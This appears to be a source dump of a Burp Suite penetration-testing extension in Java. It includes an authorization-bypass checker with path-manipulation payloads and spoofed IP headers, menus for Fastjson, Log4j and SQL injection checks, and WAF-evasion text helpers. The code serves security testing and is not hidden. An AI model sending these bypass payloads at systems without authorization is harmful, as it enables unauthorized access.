DbUtils.close(connection, ps, null);
}
}
// 根据type获取多个
public static List<SqlBean> getSqlListsByType(String type){
List<SqlBean> sqlLists = new ArrayList<>();
String routesql = "select * from sqli where type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
ResultSet resultSet = null;
try {
ps = connection.prepareStatement(routesql);
ps.setString(1, type);
resultSet = ps.executeQuery();
while (resultSet.next()) {
SqlBean sqlBean = new SqlBean();
sqlBean.setId(resultSet.getInt("id"));
sqlBean.setType(resultSet.getString("type"));
sqlBean.setValue(resultSet.getString("value"));
sqlLists.add(sqlBean);
}
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, resultSet);
}
return sqlLists;
}
// 根据type获取一个
public static SqlBean getSqlListByType(String type){
String routesql = "select * from sqli where type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
ResultSet resultSet = null;
try {
ps = connection.prepareStatement(routesql);
ps.setString(1, type);
resultSet = ps.executeQuery();
while (resultSet.next()) {
SqlBean sqlBean = new SqlBean();
sqlBean.setId(resultSet.getInt("id"));
sqlBean.setType(resultSet.getString("type"));
sqlBean.setValue(resultSet.getString("value"));
return sqlBean;
}
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, resultSet);
}
return null;
}
// 根据type删除
public static void deleteSqlByType(String type){
String sql = "delete from sqli where type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, type);
ps.executeUpdate();
} catch (Exception e) {
e.printStackTrace();
} finally {
DbUtils.close(connection, ps, null);
}
}
// 根据type和value删除
public static void deleteSqlByTypeAndValue(String type, String value){
String sql = "delete from sqli where type = ? and value = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, type);
ps.setString(2, value);
ps.executeUpdate();
} catch (Exception e) {
e.printStackTrace();
}
}
}
================================================
FILE: src/main/java/burp/menu/AuthMenu.java
================================================
package burp.menu;
import burp.IHttpRequestResponse;
import burp.ui.AuthUI;
import javax.swing.*;
import java.awt.event.ActionListener;
public class AuthMenu extends JMenuItem {
public AuthMenu(IHttpRequestResponse[] requestResponses) {
this.setText("^_^ AuthBypass Check");
this.addActionListener(new ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
Thread thread = new Thread(new Runnable() {
@Override
public void run() {
AuthUI.Check(requestResponses);
}
});
thread.start();
}
});
}
}
================================================
FILE: src/main/java/burp/menu/FastjsonMenu.java
================================================
package burp.menu;
import burp.IHttpRequestResponse;
import burp.ui.FastjsonUI;
import javax.swing.*;
import java.awt.event.ActionListener;
public class FastjsonMenu extends JMenuItem {
public JMenuItem FastjsonDnslogMenu(IHttpRequestResponse[] responses) {
this.setText("^_^ FastJson Dnslog Check");
this.addActionListener(new ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
Thread thread = new Thread(new Runnable() {
@Override
public void run() {
new FastjsonUI().CheckDnslog(responses);
}
});
thread.start();
}
});
return this;
}
public JMenuItem FastjsonEchoMenu(IHttpRequestResponse[] responses) {
this.setText("^_^ FastJson Echo Check");
this.addActionListener(new ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
Thread thread = new Thread(new Runnable() {
@Override
public void run() {
new FastjsonUI().CheckEchoVul(responses);
}
});
thread.start();
}
});
return this;
}
public JMenuItem FastjsonJNDIMenu(IHttpRequestResponse[] responses) {
this.setText("^_^ FastJson JNDI Check");
this.addActionListener(new ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
Thread thread = new Thread(new Runnable() {
@Override
public void run() {
new FastjsonUI().CheckJNDIVul(responses);
}
});
thread.start();
}
});
return this;
}
public JMenuItem FastjsonVersionMenu(IHttpRequestResponse[] responses) {
this.setText("^_^ FastJson Version Check");
this.addActionListener(new ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
Thread thread = new Thread(new Runnable() {
@Override
public void run() {
new FastjsonUI().CheckVersion(responses);
}
});
thread.start();
}
});
return this;
}
}
================================================
FILE: src/main/java/burp/menu/Log4jMenu.java
================================================
package burp.menu;
import burp.IHttpRequestResponse;
import burp.ui.Log4jUI;
import javax.swing.*;
import java.awt.event.ActionListener;
public class Log4jMenu extends JMenuItem {
public Log4jMenu(IHttpRequestResponse[] requestResponses) {
this.setText("^_^ Log4j Check");
this.addActionListener(new ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
Thread thread = new Thread(new Runnable() {
@Override
public void run() {
Log4jUI.Check(requestResponses,true);
}
});
thread.start();
}
});
}
}
================================================
FILE: src/main/java/burp/menu/NucleiMenu.java
================================================
package burp.menu;
import burp.IHttpRequestResponse;
import burp.utils.Nuclei;
import javax.swing.*;
import java.awt.event.ActionListener;
public class NucleiMenu extends JMenuItem {
public NucleiMenu(IHttpRequestResponse[] requestResponses) {
this.setText("^_^ Nuclei Template");
this.addActionListener(new ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
Thread thread = new Thread(new Runnable() {
@Override
public void run() {
Nuclei.Generate(requestResponses);
}
});
thread.start();
}
});
}
}
================================================
FILE: src/main/java/burp/menu/PermMenu.java
================================================
package burp.menu;
import burp.IHttpRequestResponse;
import burp.ui.PermUI;
import javax.swing.*;
import java.awt.event.ActionListener;
public class PermMenu extends JMenuItem {
public PermMenu(IHttpRequestResponse[] requestResponses) {
this.setText("^_^ Perm Check");
this.addActionListener(new ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
Thread thread = new Thread(new Runnable() {
@Override
public void run() {
PermUI.Check(requestResponses,true);
}
});
thread.start();
}
});
}
}
================================================
FILE: src/main/java/burp/menu/RouteMenu.java
================================================
package burp.menu;
import burp.IHttpRequestResponse;
import burp.ui.AuthUI;
import burp.ui.RouteUI;
import javax.swing.*;
import java.awt.event.ActionListener;
public class RouteMenu extends JMenuItem {
public RouteMenu(IHttpRequestResponse[] requestResponses) {
this.setText("^_^ Route Check");
this.addActionListener(new ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
Thread thread = new Thread(new Runnable() {
@Override
public void run() {
RouteUI.Check(requestResponses,true);
}
});
thread.start();
}
});
}
}
================================================
FILE: src/main/java/burp/menu/SqlMenu.java
================================================
package burp.menu;
import burp.IHttpRequestResponse;
import burp.ui.SqlUI;
import javax.swing.*;
import java.awt.event.ActionListener;
public class SqlMenu extends JMenuItem {
public SqlMenu(IHttpRequestResponse[] requestResponses) {
this.setText("^_^ Sql Check");
this.addActionListener(new ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
Thread thread = new Thread(new Runnable() {
@Override
public void run() {
SqlUI.Check(requestResponses,true);
}
});
thread.start();
}
});
}
}
================================================
FILE: src/main/java/burp/menu/TextProcessMenu.java
================================================
package burp.menu;
import burp.IContextMenuInvocation;
import burp.utils.Utils;
import javax.swing.*;
import java.awt.*;
import java.awt.datatransfer.Clipboard;
import java.awt.datatransfer.StringSelection;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.util.Random;
import java.util.stream.Collectors;
import java.util.stream.IntStream;
/**
* 文本处理菜单
* 提供各种文本转换功能
*/
public class TextProcessMenu extends JMenu {
private final IContextMenuInvocation invocation;
private final Random random = new Random();
private final SecureRandom secureRandom = new SecureRandom();
public TextProcessMenu(IContextMenuInvocation invocation) {
super("Helper");
this.invocation = invocation;
initMenu();
}
/**
* 初始化菜单项
*/
private void initMenu() {
// Unicode解码菜单项
JMenuItem unicodeDecode = new JMenuItem("Unicode Decode");
unicodeDecode.addActionListener(e -> processSelectedText(this::unicodeDecode));
// URL解码菜单项
JMenuItem urlDecode = new JMenuItem("URL Decode");
urlDecode.addActionListener(e -> processSelectedText(this::urlDecode));
// 关键字拆分菜单项
JMenuItem splitKeyword = new JMenuItem("Split Keyword");
splitKeyword.addActionListener(e -> processSelectedText(this::splitKeyword));
// 随机大小写菜单项
JMenuItem randomCase = new JMenuItem("Random Case");
randomCase.addActionListener(e -> processSelectedText(this::randomCase));
// 添加生成脏数据菜单项
JMenuItem dirtyData = new JMenuItem("Generate Dirty Data");
dirtyData.addActionListener(e -> dirtyGetRandomString());
// 添加Base64数据标签菜单项
JMenuItem base64Tag = new JMenuItem("Insert Base64 Tag");
base64Tag.addActionListener(e -> checkBase64Data());
add(unicodeDecode);
add(urlDecode);
add(splitKeyword);
add(randomCase);
add(dirtyData);
add(base64Tag);
}
/**
* 处理选中的文本
*/
private void processSelectedText(TextProcessor processor) {
try {
// 检查消息选择
if (invocation.getSelectedMessages() == null || invocation.getSelectedMessages().length == 0) {
JOptionPane.showMessageDialog(null, "No message selected!");
return;
}
// 获取选择范围
int[] bounds = invocation.getSelectionBounds();
if (bounds == null || bounds[0] == bounds[1]) {
JOptionPane.showMessageDialog(null, "Please select text first!");
return;
}
// 获取当前选中的文本所在的字节数据
byte[] contextBytes;
int context = invocation.getInvocationContext();
if (context == IContextMenuInvocation.CONTEXT_MESSAGE_EDITOR_REQUEST ||
context == IContextMenuInvocation.CONTEXT_MESSAGE_VIEWER_REQUEST) {
contextBytes = invocation.getSelectedMessages()[0].getRequest();
} else {
contextBytes = invocation.getSelectedMessages()[0].getResponse();
}
if (contextBytes == null) {
JOptionPane.showMessageDialog(null, "No content available!");
return;
}
// 提取选中的文本部分
String fullText = new String(contextBytes);
String selected = fullText.substring(bounds[0], bounds[1]);
// 处理选中的文本
String processed = processor.process(selected);
// 在弹窗中显示结果
showProcessedResult(processed);
} catch (Exception ex) {
Utils.stderr.println("Error processing text: " + ex.getMessage());
JOptionPane.showMessageDialog(null, "Error: " + ex.getMessage());
}
}
private void showProcessedResult(String result) {
// 创建一个可复制的文本区域
JTextArea textArea = new JTextArea(result);
textArea.setEditable(false);
textArea.setWrapStyleWord(true);
textArea.setLineWrap(true);
// 创建滚动面板
JScrollPane scrollPane = new JScrollPane(textArea);
scrollPane.setPreferredSize(new Dimension(400, 300));
// 创建复制按钮
JButton copyButton = new JButton("复制到剪贴板");
copyButton.addActionListener(e -> {
StringSelection stringSelection = new StringSelection(result);
Clipboard clipboard = Toolkit.getDefaultToolkit().getSystemClipboard();
clipboard.setContents(stringSelection, null);
JOptionPane.showMessageDialog(null, "复制到粘贴板!", "Success", JOptionPane.INFORMATION_MESSAGE);
});
// 创建包含文本区域和按钮的面板
JPanel panel = new JPanel(new BorderLayout());
panel.add(scrollPane, BorderLayout.CENTER);
panel.add(copyButton, BorderLayout.SOUTH);
// 显示对话框
JOptionPane.showMessageDialog(
null,
panel,
"Process Result",
JOptionPane.INFORMATION_MESSAGE
);
}
/**
* URL解码并在弹出框中显示结果
*/
private String urlDecode(String text) {
try {
// URL解码,使用UTF-8编码支持中文
return URLDecoder.decode(text, StandardCharsets.UTF_8.name());
} catch (Exception e) {
Utils.stderr.println("Error decoding URL: " + e.getMessage());
JOptionPane.showMessageDialog(null, "Error decoding URL: " + e.getMessage());
return text;
}
}
/**
* Unicode解码并在弹出框中显示结果
*/
private String unicodeDecode(String text) {
StringBuilder result = new StringBuilder();
int i = 0;
while (i < text.length()) {
if (text.startsWith("\\u", i) && i + 6 <= text.length()) {
String hex = text.substring(i + 2, i + 6);
try {
result.append((char) Integer.parseInt(hex, 16));
i += 6;
continue;
} catch (NumberFormatException ignored) {
}
}
result.append(text.charAt(i));
i++;
}
return result.toString();
}
/**
* 关键字拆分
*/
private String splitKeyword(String text) {
StringBuilder result = new StringBuilder();
int chunkSize = 2; // 每段的默认长度
for (int i = 0; i < text.length(); i += chunkSize) {
if (i > 0) {
result.append("+");
}
int end = Math.min(i + chunkSize, text.length());
String chunk = text.substring(i, end);
result.append("'").append(chunk).append("'");
}
return result.toString();
}
/**
* 随机大小写转换
*/
private String randomCase(String text) {
return IntStream.range(0, text.length())
.mapToObj(i -> {
char c = text.charAt(i);
return random.nextBoolean() ?
Character.toUpperCase(c) :
Character.toLowerCase(c);
})
.map(String::valueOf)
.collect(Collectors.joining());
}
/**
* 生成指定数量的随机字符
*/
private String getRandomString(int number) {
StringBuilder str = new StringBuilder("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz");
StringBuilder result = new StringBuilder();
for (int i = 0; i < number; i++) {
int index = secureRandom.nextInt(str.length());
result.append(str.charAt(index));
}
return result.toString();
}
/**
* 弹窗获取用户输入并生成脏数据
*/
private void dirtyGetRandomString() {
String s = JOptionPane.showInputDialog("Please Input Data Size(n*kb): ");
if (s != null && !s.trim().isEmpty()) {
try {
int size = Integer.parseInt(s);
String dirtyData = getRandomString(size * 1024);
StringSelection stringSelection = new StringSelection(dirtyData);
Clipboard clipboard = Toolkit.getDefaultToolkit().getSystemClipboard();
clipboard.setContents(stringSelection, null);
JOptionPane.showMessageDialog(null, "请在需要的位置粘贴", "Tips", JOptionPane.INFORMATION_MESSAGE);
} catch (NumberFormatException ex) {
JOptionPane.showMessageDialog(null, "Please input a valid number", "Error", JOptionPane.ERROR_MESSAGE);
}
} else {
JOptionPane.showMessageDialog(null, "Please Input Data Size", "Tips", JOptionPane.INFORMATION_MESSAGE);
}
}
/**
* 插入Base64数据标签
*/
private void checkBase64Data() {
StringSelection stringSelection = new StringSelection("<datab64></datab64>");
Clipboard clipboard = Toolkit.getDefaultToolkit().getSystemClipboard();
clipboard.setContents(stringSelection, null);
JOptionPane.showMessageDialog(null, "请在需要的位置粘贴", "Tips", JOptionPane.INFORMATION_MESSAGE);
}
/**
* 文本处理接口
*/
@FunctionalInterface
private interface TextProcessor {
String process(String text);
}
}
================================================
FILE: src/main/java/burp/ui/AuthUI.java
================================================
package burp.ui;
import burp.*;
import burp.bean.AuthBean;
import burp.utils.I18nUtils;
import burp.utils.Utils;
import javax.swing.*;
import javax.swing.table.AbstractTableModel;
import javax.swing.table.TableColumnModel;
import javax.swing.table.TableModel;
import java.awt.*;
import java.awt.event.ActionEvent;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.Objects;
import java.util.concurrent.locks.Lock;
import java.util.concurrent.locks.ReentrantLock;
/**
* @Author Xm17
* @Date 2024-06-22 8:46
*/
public class AuthUI implements UIHandler, IMessageEditorController {
private JPanel panel; // 主面板
private static JTable authTable; // auth表格
private JButton btnClear; // 清空按钮
private JTextField ipInputField; // ip输入框
private JButton saveBtn; // ip确认按钮
private JTabbedPane authtabbedPanereq; // 请求tab
private JTabbedPane authtabbedPaneresp; // 响应tab
private IHttpRequestResponse currentlyDisplayedItem; // 当前显示的请求
private IMessageEditor HRequestTextEditor; // 请求编辑器
private IMessageEditor HResponseTextEditor; // 响应编辑器
private static final List<AuthEntry> authlog = new ArrayList<>(); //authlog 列表
private static final List<String> urlHashList = new ArrayList<>(); // url hash列表
private static final Lock lock = new ReentrantLock();
private static String LOCAL_IP = "127.0.0.1";
@Override
public IHttpService getHttpService() {
return currentlyDisplayedItem.getHttpService();
}
@Override
public byte[] getRequest() {
return currentlyDisplayedItem.getRequest();
}
@Override
public byte[] getResponse() {
return currentlyDisplayedItem.getResponse();
}
@Override
public void init() {
setupUI();
setupData();
}
// 初始化数据
private void setupData() {
btnClear.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
// 清空urltable
authlog.clear();
HRequestTextEditor.setMessage(new byte[0], true);
HResponseTextEditor.setMessage(new byte[0], false);
urlHashList.clear();
authTable.updateUI();
}
});
saveBtn.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
if (!ipInputField.getText().equals(LOCAL_IP)) {
LOCAL_IP = ipInputField.getText();
}else {
LOCAL_IP = "127.0.0.1";
}
}
});
}
// 初始化ui
private void setupUI() {
panel = new JPanel();
panel.setLayout(new BorderLayout());
// 添加FlowLayout布局,将清空按钮添加
JPanel topPanel = new JPanel(new FlowLayout(FlowLayout.LEFT));
btnClear = new JButton(I18nUtils.get("auth.button.clear"));
topPanel.add(btnClear);
JLabel ipLabel = new JLabel(I18nUtils.get("auth.label.ip"));
topPanel.add(ipLabel);
ipInputField = new JTextField("127.0.0.1");
topPanel.add(ipInputField);
saveBtn = new JButton(I18nUtils.get("auth.button.save"));
topPanel.add(saveBtn);
panel.add(topPanel, BorderLayout.NORTH);
// 上下分割面板,比例是7:3
JSplitPane mainsplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);
mainsplitPane.setResizeWeight(0.7);
mainsplitPane.setDividerLocation(0.7);
// 添加URLTable到mainsplitPane的上边
authTable = new URLTable(new AuthModel());
authTable.setAutoCreateRowSorter(true);
JScrollPane scrollPane = new JScrollPane(authTable);
mainsplitPane.setTopComponent(scrollPane);
// 左右分割面板,对称分割
JSplitPane splitPaneDown = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT);
splitPaneDown.setResizeWeight(0.5);
splitPaneDown.setDividerLocation(0.5);
// 添加请求响应到左右分割面板
authtabbedPanereq = new JTabbedPane();
HRequestTextEditor = Utils.callbacks.createMessageEditor(AuthUI.this, true);
authtabbedPanereq.addTab("Request", HRequestTextEditor.getComponent());
authtabbedPaneresp = new JTabbedPane();
HResponseTextEditor = Utils.callbacks.createMessageEditor(AuthUI.this, false);
authtabbedPaneresp.addTab("Response", HResponseTextEditor.getComponent());
splitPaneDown.setLeftComponent(authtabbedPanereq);
splitPaneDown.setRightComponent(authtabbedPaneresp);
// 添加splitPaneDown到mainsplitPane的下边
mainsplitPane.setBottomComponent(splitPaneDown);
panel.add(mainsplitPane, BorderLayout.CENTER);
}
@Override
public JPanel getPanel(IBurpExtenderCallbacks callbacks) {
return panel;
}
@Override
public String getTabName() {
return "BypassAuth";
}
// auth核心检测方法
public static void Check(IHttpRequestResponse[] requestResponses) {
lock.lock();
try {
IHttpRequestResponse baseRequestResponse = requestResponses[0];
IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);
String method = analyzeRequest.getMethod();
String path = analyzeRequest.getUrl().getPath();
String request = Utils.helpers.bytesToString(baseRequestResponse.getRequest());
List<IParameter> paraLists = analyzeRequest.getParameters();
URL rdurlURL = analyzeRequest.getUrl();
String url = analyzeRequest.getUrl().toString();
byte[] byte_Request = baseRequestResponse.getRequest();
int len = byte_Request.length;
byte[] body = Arrays.copyOfRange(byte_Request, analyzeRequest.getBodyOffset(), len);
// url 中匹配为静态资源
if (Utils.isUrlBlackListSuffix(url)) {
return;
}
List<String> headers = Utils.helpers.analyzeRequest(baseRequestResponse).getHeaders();
String urlWithoutQuery = "";
try {
URL url1 = new URL(url);
String protocol = url1.getProtocol();
String host = url1.getHost();
int port = url1.getPort();
urlWithoutQuery = protocol + "://" + host + ":" + port;
} catch (MalformedURLException e) {
throw new RuntimeException(e);
}
List<AuthBean> authRequests = new ArrayList<>();
authRequests.addAll(prefix(method, path));
authRequests.addAll(suffix(method, path));
if (Objects.equals(method, "GET") || Objects.equals(method, "POST")) {
for (AuthBean value : authRequests) {
if (Objects.equals(value.getMethod(), "GET")) {
String new_request = request.replaceFirst(path, value.getPath());
IHttpRequestResponse response = Utils.callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), Utils.helpers.stringToBytes(new_request));
String requrl = urlWithoutQuery + value.getPath();
String statusCode = String.valueOf(Utils.helpers.analyzeResponse(response.getResponse()).getStatusCode());
String length = String.valueOf(response.getResponse().length);
add(method, requrl, statusCode, length, response);
} else if (Objects.equals(value.getMethod(), "POST")) {
String new_request = request.replaceFirst(path, value.getPath());
IHttpRequestResponse response = Utils.callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), Utils.helpers.stringToBytes(new_request));
String requrl = urlWithoutQuery + value.getPath();
String statusCode = String.valueOf(Utils.helpers.analyzeResponse(response.getResponse()).getStatusCode());
String length = String.valueOf(response.getResponse().length);
add(method, requrl, statusCode, length, response);
}
}
// 测试伪造ip
List<AuthBean> testHeaders = forgeHeaders(method, url);
for (AuthBean header : testHeaders) {
headers.add(header.getHeaders());
}
byte[] message = Utils.helpers.buildHttpMessage(headers, body);
IHttpRequestResponse response = Utils.callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), message);
String statusCode = String.valueOf(Utils.helpers.analyzeResponse(response.getResponse()).getStatusCode());
String length = String.valueOf(response.getResponse().length);
add(method, url, statusCode, length, response);
for (AuthBean header : testHeaders) {
headers.remove(header.getHeaders());
}
// 单独测试实战绕过案例
changeAccept(headers, body, method, url, baseRequestResponse);
}
} finally {
lock.unlock();
}
}
// 添加数据到表格
private static void add(String method, String url, String statuscode, String length, IHttpRequestResponse baseRequestResponse) {
synchronized (authlog) {
int id = authlog.size();
authlog.add(new AuthEntry(id, method, url, statuscode, length, baseRequestResponse));
authTable.updateUI();
}
}
// 添加后缀
public static List<AuthBean> suffix(String method, String path) {
if (path.startsWith("//")) {
path = "/" + path.substring(2).replaceAll("/+", "/");
}
List<AuthBean> authRequests = new ArrayList<>();
if (path.endsWith("/")) {
path = path.substring(0, path.length() - 1);
List<String> payloads = Arrays.asList(path + "%2e/", path + "/.", "./" + path + "/./", path + "%20/",
"/%20" + path + "%20/", path + "..;/", path + "?", path + "??", "/" + path + "//",
path + "/", path + "/.randomstring");
for (String payload : payloads) {
if ("GET".equals(method)) {
authRequests.add(new AuthBean("GET", payload, ""));
} else if ("POST".equals(method)) {
authRequests.add(new AuthBean("POST", payload, ""));
}
}
} else {
List<String> payloads = Arrays.asList(path + "/%2e", path + "/%20", path + "%0d%0a", path + ".json", path + "/.randomstring");
for (String payload : payloads) {
if ("GET".equals(method)) {
authRequests.add(new AuthBean("GET", payload, ""));
} else if ("POST".equals(method)) {
authRequests.add(new AuthBean("POST", payload, ""));
}
}
}
return authRequests;
}
// 添加前缀
public static List<AuthBean> prefix(String method, String path) {
if (path.startsWith("//")) {
path = "/" + path.substring(2).replaceAll("/+", "/");
}
List<AuthBean> authRequests = new ArrayList<>();
String[] prefix = {";/", ".;/", "images/..;/", ";a/", "%23/../", "..;/..;/"};
for (String s : prefix) {
// 将路径按 / 分割为多个部分
String[] pathParts = path.split("/");
for (int i = 1; i < pathParts.length; i++) {
// 输出从第二个部分到最后一个部分
String[] subPathParts = Arrays.copyOfRange(pathParts, i, pathParts.length);
String[] prePathParts = Arrays.copyOfRange(pathParts, 1, i);
if (prePathParts.length > 0) {
if ("GET".equals(method)) {
authRequests.add(new AuthBean("GET", "/" + String.join("/", prePathParts) + "/" + s + String.join("/", subPathParts), ""));
} else if ("POST".equals(method)) {
authRequests.add(new AuthBean("POST", "/" + String.join("/", prePathParts) + "/" + s + String.join("/", subPathParts), ""));
}
} else {
if ("GET".equals(method)) {
authRequests.add(new AuthBean("GET", "/" + s + String.join("/", subPathParts), ""));
} else if ("POST".equals(method)) {
authRequests.add(new AuthBean("POST", "/" + s + String.join("/", subPathParts), ""));
}
}
}
}
return authRequests;
}
// 添加头部
public static List<AuthBean> forgeHeaders(String method, String url) {
List<AuthBean> authRequests = new ArrayList<>();
List<String> payloads = Arrays.asList(
"X-Forwarded-For: %s",
"X-Originating-IP: %s",
"X-Remote-IP: %s",
"X-Remote-Addr: %s"
);
// 对payloads进行替换
payloads.replaceAll(s -> String.format(s, LOCAL_IP));
for (String payload : payloads) {
if ("GET".equals(method)) {
authRequests.add(new AuthBean("GET", "", payload));
} else if ("POST".equals(method)) {
authRequests.add(new AuthBean("POST", "", payload));
}
}
return authRequests;
}
// 添加accept
// https://mp.weixin.qq.com/s/6YMDu6FTLa_9s6_mewrp0A
public static void changeAccept(List<String> headers, byte[] body, String method, String url, IHttpRequestResponse baseRequestResponse) {
// 判断headers立马是否有Accept,如果有则删除
headers.removeIf(header -> header.startsWith("Accept:"));
headers.add("Accept: application/json, text/javascript, /; q=0.01");
byte[] message = Utils.helpers.buildHttpMessage(headers, body);
IHttpRequestResponse response = Utils.callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), message);
// 发送请求
String statusCode = String.valueOf(Utils.helpers.analyzeResponse(response.getResponse()).getStatusCode());
String length = String.valueOf(response.getResponse().length);
add(method, url, statusCode, length, response);
}
// auth实体
private static class AuthEntry {
private final int id;
private final String method;
private final String url;
private final String status;
private final String length;
private final IHttpRequestResponse requestResponse;
public AuthEntry(int id, String method, String url, String status, String length, IHttpRequestResponse requestResponse) {
this.id = id;
this.method = method;
this.url = url;
this.status = status;
this.length = length;
this.requestResponse = requestResponse;
}
}
// auth 模型
private static class AuthModel extends AbstractTableModel {
@Override
public int getRowCount() {
return authlog.size();
}
@Override
public int getColumnCount() {
return 5;
}
@Override
public Object getValueAt(int rowIndex, int columnIndex) {
switch (columnIndex) {
case 0:
return authlog.get(rowIndex).id;
case 1:
return authlog.get(rowIndex).method;
case 2:
return authlog.get(rowIndex).url;
case 3:
return authlog.get(rowIndex).status;
case 4:
return authlog.get(rowIndex).length;
default:
return null;
}
}
@Override
public String getColumnName(int column) {
switch (column) {
case 0:
return "id";
case 1:
return "method";
case 2:
return "url";
case 3:
return "status";
case 4:
return "length";
default:
return null;
}
}
}
// auth 表格
private class URLTable extends JTable {
public URLTable(TableModel dm) {
super(dm);
TableColumnModel columnModel = getColumnModel();
columnModel.getColumn(0).setMaxWidth(50);
columnModel.getColumn(4).setMaxWidth(50);
}
@Override
public void changeSelection(int row, int col, boolean toggle, boolean extend) {
AuthEntry logEntry = authlog.get(row);
HRequestTextEditor.setMessage(logEntry.requestResponse.getRequest(), true);
if (logEntry.requestResponse.getResponse() == null) {
HResponseTextEditor.setMessage(new byte[0], false);
} else {
HResponseTextEditor.setMessage(logEntry.requestResponse.getResponse(), false);
}
currentlyDisplayedItem = logEntry.requestResponse;
super.changeSelection(row, col, toggle, extend);
}
}
}
================================================
FILE: src/main/java/burp/ui/ConfigUI.java
================================================
package burp.ui;
import burp.IBurpExtenderCallbacks;
import burp.bean.ConfigBean;
import burp.utils.I18nUtils;
import burp.utils.UrlCacheUtil;
import burp.utils.Utils;
import com.intellij.uiDesigner.core.GridConstraints;
import com.intellij.uiDesigner.core.GridLayoutManager;
import com.intellij.uiDesigner.core.Spacer;
import javax.swing.*;
import javax.swing.table.AbstractTableModel;
import java.awt.*;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.util.ArrayList;
import java.util.List;
import static burp.dao.ConfigDao.*;
public class ConfigUI implements UIHandler {
private static final List<LogEntry> data = new ArrayList<>();
public AbstractTableModel dataModel = new ConfigModel();
private JPanel panel;
private JPanel configPanel;
private JLabel dnslogLabel;
private JTextField dnslogTextField;
private JLabel ipLabel;
private JTextField ipTextField;
private JLabel toolNameLabel;
private JTextField toolNameTextField;
private JButton toolButton;
private JTextField toolArgvTextField;
private JButton ipButton;
private JButton dnslogButton;
private JLabel toolArgvLabel;
private JButton refershButton;
private JButton deleteSelectButton;
private JButton clearCacheButton;
private JButton resetUrl;
private JTable configTable;
private JScrollPane configPanelDownJscrollPanel;
private JPanel configPanelTop;
private JPanel configPanelDown;
private JLabel languageLabel;
private JComboBox<String> languageComboBox;
private void setupUI() {
// 创建主面板
panel = new JPanel();
panel.setLayout(new GridLayoutManager(1, 1, new Insets(0, 0, 0, 0), -1, -1));
// 创建配置面板
configPanel = new JPanel();
configPanel.setLayout(new BorderLayout(0, 0));
panel.add(configPanel, new GridConstraints(0, 0, 1, 1,
GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_BOTH,
GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW,
GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW,
null, null, null, 0, false));
// 配置顶部面板
configPanelTop = new JPanel();
configPanelTop.setLayout(new GridLayoutManager(5, 9, new Insets(10, 10, 10, 10), 5, 5)); // 增加间距,添加语言选择行
configPanel.add(configPanelTop, BorderLayout.NORTH);
// 语言选择行
languageLabel = new JLabel();
languageLabel.setText(I18nUtils.get("common.label.language"));
configPanelTop.add(languageLabel, new GridConstraints(0, 0, 1, 1,
GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE,
GridConstraints.SIZEPOLICY_FIXED, GridConstraints.SIZEPOLICY_FIXED,
null, null, null, 0, false));
languageComboBox = new JComboBox<>(new String[]{"English", "中文"});
languageComboBox.setSelectedItem(I18nUtils.isChinese() ? "中文" : "English");
configPanelTop.add(languageComboBox, new GridConstraints(0, 1, 1, 3,
GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL,
GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED,
null, new Dimension(250, -1), null, 0, false));
// DNS日志配置行
dnslogLabel = new JLabel();
dnslogLabel.setText(I18nUtils.get("config.label.dnslog"));
configPanelTop.add(dnslogLabel, new GridConstraints(1, 0, 1, 1,
GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE,
GridConstraints.SIZEPOLICY_FIXED, GridConstraints.SIZEPOLICY_FIXED,
null, null, null, 0, false));
dnslogTextField = new JTextField();
configPanelTop.add(dnslogTextField, new GridConstraints(1, 1, 1, 3,
GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL,
GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED,
null, new Dimension(250, -1), null, 0, false));
dnslogButton = new JButton();
dnslogButton.setText(I18nUtils.get("config.button.save"));
